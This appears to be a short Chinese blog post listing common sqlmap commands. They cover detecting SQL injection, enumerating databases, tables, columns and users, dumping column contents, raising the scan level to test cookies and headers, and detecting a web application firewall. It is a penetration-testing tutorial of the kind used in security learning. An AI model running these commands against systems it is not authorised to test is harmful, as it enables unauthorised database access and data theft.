sqlmap常用参数总结

博客总结了sqlmap常用参数,包括判断注入、获取数据库名、表名、列名及内容、数据库用户名等操作的参数使用方法。还提到sqlmap默认运行级别及不同级别对cookie、user - agent等的检测情况,以及监测防护和绕过防护的相关内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sqlmap常用参数总结
1.判断是否存在注入
sqlmap.py -u “URL” 判断url中的参数是否存在注入,url包含多个参数
sqlmap.py -u URL 判断url中的参数是否存在注入,url包含一个参数
sqlmap.py -r xxx.txt 判断text文本中的http请求包是否存在注入,包括请求包里的所有参数
2.获取数据库名
sqlmap.py -u URL --dbs 获取所有的数据库名
sqlmap.py -u URL --current_db 获取当前数据库的数据库名
3.获取表名
sqlmap.py -u URL -D xxx --tables 获取xxx数据库的所有表名
4.获取列名
sqlmap.py -u URL -D xxx -T xx --columns 获取xxx数据库的xx表的所有列名
5.获取列的内容
sqlmap.py -u URL -D xxx -T xx -C x,y --dump 获取xxx数据库的xx表的x列和y列的内容
6.获取数据库用户名
sqlmap.py -u URL --users 获取所有用户名
sqlmap.py -u URL --current_user 获取当前用户名
需要注意的是,sqlmap默认运行在level1,是不测cookie和refer的。如果想测cookie,请至少设为level2,如果想测user-agent或refer,设为level3.比如设为level 3
sqlmap.py -u URL --level3
7.监测是否设有防护
sqlmap.py -u URL --identify_waf
如果需要绕过,我觉得还是手工绕过比较方便。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值